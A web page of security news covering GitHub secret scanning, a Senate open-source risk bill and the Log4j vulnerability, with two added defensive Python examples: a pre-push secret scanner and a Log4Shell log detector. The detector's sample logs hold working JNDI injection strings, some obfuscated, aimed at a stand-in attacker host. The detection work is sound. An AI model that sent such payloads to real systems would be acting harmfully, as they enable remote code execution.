GitHub Is Testing New Security Tools for Open-Source Code

Cloud-based code hosting service GitHub wants to make open-source code more secure. The Microsoft-owned service is expanding its security features with two new offerings in beta: secret scanning alerts are now free for all public repositories, and push protection, which blocks a push that contains a detected secret, is being extended to custom, organization-defined secret patterns. Open-source code is now incorporated into 97 percent of applications, according to Synopsys, which says 90 percent of organizations rely on it to varying degrees. Yet the very openness that contributes to its popularity also exposes it to malicious actors, as the SolarWinds and Log4j incidents emphasized.
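To make the push-protection idea concrete, here is an added example, not GitHub's own code or its pattern syntax, of a pre-push check that scans only the lines a commit adds against a small set of custom secret patterns and blocks the push on any hit. The "acme_" token format, the internal database URL format and the diff itself are all constructed for illustration.

```python
import re

# Constructed custom patterns, in the spirit of the custom secret patterns an
# organization can define for secret scanning. The "acme_" token format and the
# internal database URL format are hypothetical, chosen to show how a pattern
# catches a credential before it lands in a public repository.
CUSTOM_PATTERNS = {
    "acme_api_key": re.compile(r"\bacme_(?:live|test)_[A-Za-z0-9]{32}\b"),
    "internal_db_url": re.compile(r"postgres://[^\s:/]+:[^\s@]+@[^\s/]+/\w+"),
}

# Unified-diff hunk header "@@ -old,len +new,len @@"; only the starting line
# number on the new side is needed to report where the secret would land.
HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")


def scan_diff(diff, patterns=CUSTOM_PATTERNS):
    """Scan only the added lines of a unified diff (what a push introduces)
    and return (new_line_number, pattern_name, secret) for every hit."""
    hits = []
    new_lineno = None  # None until the first hunk header of a file
    for raw in diff.splitlines():
        if raw.startswith("diff "):
            new_lineno = None  # next file: wait for its first hunk
            continue
        m = HUNK_RE.match(raw)
        if m:
            new_lineno = int(m.group(1))
            continue
        if new_lineno is None or raw.startswith("-"):
            continue  # file headers, or removed lines (not pushed content)
        content = raw[1:] if raw[:1] in "+ " else raw
        if raw.startswith("+"):
            for name, rx in patterns.items():
                for mm in rx.finditer(content):
                    hits.append((new_lineno, name, mm.group(0)))
        new_lineno += 1  # context and added lines both advance the new side
    return hits


def redact(secret, keep=4):
    """Show only a short prefix so the alert itself does not leak the value."""
    return secret[:keep] + "*" * (len(secret) - keep)


def push_protection_report(diff, patterns=CUSTOM_PATTERNS):
    """Return (blocked, messages): the push is blocked if any pattern matched."""
    hits = scan_diff(diff, patterns)
    messages = [f"line {ln}: {name} -> {redact(s)}" for ln, name, s in hits]
    return (len(hits) > 0, messages)


# Constructed diff of a commit that hard-codes two credentials.
SAMPLE_DIFF = """\
diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -1,3 +1,4 @@
 import os
-API_KEY = os.environ["ACME_API_KEY"]
+API_KEY = "acme_live_0123456789abcdef0123456789abcdef"
+DB_URL = "postgres://app:hunter2@db.internal/prod"
 DEBUG = False
"""

if __name__ == "__main__":
    blocked, msgs = push_protection_report(SAMPLE_DIFF)
    print("push blocked" if blocked else "push allowed")
    for msg in msgs:
        print(" ", msg)
```

Scanning only added lines is what keeps this cheap enough to run on every push, but it also means a secret already sitting in history is not caught here; that is what the repository-wide scanning alerts are for. The `\b` anchors and the fixed token length in the key pattern matter in practice: a looser pattern will page people on every base64 blob in the tree.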

Senate Group Wants CISA to Protect Open-Source Software

Senate Homeland Security Committee leaders Gary Peters (D-Michigan) and Rob Portman (R-Ohio) have introduced a bill that would require a risk framework for open-source code. The proposed legislation would direct the Cybersecurity and Infrastructure Security Agency (CISA) to develop a risk evaluation process for open-source software used by federal agencies and critical infrastructure. The move follows the public disclosure in December of a critical vulnerability in the Apache Software Foundation's widely used Log4j Java logging library. Peters said the Log4j incident presented a serious threat to banks, hospitals and utility companies, among other national security operations.

Major Security Vulnerability Triggers Worldwide Internet Crisis

The Log4j vulnerability has the media declaring the Internet in a state of crisis. Log4j is a Java logging library maintained by the Apache Software Foundation that developers use to record application activity; it is embedded in a vast range of Java software and services, not only web servers. Security teams are rushing to patch the flaw, which is being exploited to remotely take control of vulnerable systems, steal credentials, install malware and launch further attacks that reach all the way down to consumer devices. Last week, the U.S. Cybersecurity and Infrastructure Security Agency issued a Log4j alert, as did Australia's national computer emergency response team.
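The remote takeover described above works by getting a lookup string of the form `${jndi:ldap://attacker-host/x}` into any field the application logs (the vulnerability is CVE-2021-44228), so the quickest thing a defender can do besides patching is to hunt for those strings in access logs. The following is an added example, not code from CISA, Apache or the page: a detector that first collapses the nested lookups attackers used to hide the literal "jndi" and then extracts the callback scheme and host. The log lines are constructed, and 203.0.113.0/24 is documentation address space.

```python
import re

# Added example (not from the page, CISA or Apache): detect Log4Shell
# (CVE-2021-44228) probes in web access logs. Exploitation needs a string such
# as ${jndi:ldap://attacker/x} in a logged field, so the User-Agent and the
# request path are the usual carriers.

# Attackers hid the literal "jndi" behind nested lookups that Log4j resolves
# before the JNDI lookup runs, e.g. ${lower:j}, ${::-j}, ${env:NOPE:-j}.
# Each of these evaluates to the text in its last argument.
INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # ${lower:j} -> j
    r"|\$\{[^${}]*:-([^${}]*)\}",        # ${::-j}, ${env:NOPE:-j} -> j
    re.IGNORECASE,
)

# After normalization the payload has the canonical shape ${jndi:scheme://host...}
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}\s]+)", re.IGNORECASE)


def normalize(s):
    """Collapse nested obfuscating lookups until nothing more resolves."""
    prev = None
    while prev != s:
        prev = s
        s = INNER_LOOKUP.sub(
            lambda m: next(g for g in m.groups() if g is not None), s)
    return s


def detect(lines):
    """Return (line_number, scheme, host) for each line carrying a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            findings.append((lineno, m.group("scheme").lower(), m.group("host")))
    return findings


# Constructed access-log lines (Apache combined format); not real traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/c}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:04 +0000] "GET /report?title=${date:yyyy} HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, scheme, host in detect(SAMPLE_LOGS):
        print(f"line {lineno}: JNDI lookup via {scheme} to {host}")
```

The normalization step is deliberately narrow: it only resolves lookup forms whose value is fully present in the string, so a payload that depends on a real environment or system property on the target, or that arrives in a field the web server never logs (a JSON body, a header the application logs but the proxy does not), will not show up here. Treat a hit as a probe that warrants checking the destination host, not as proof of compromise, and treat a clean log as no evidence at all; the fix remains upgrading Log4j to a patched release.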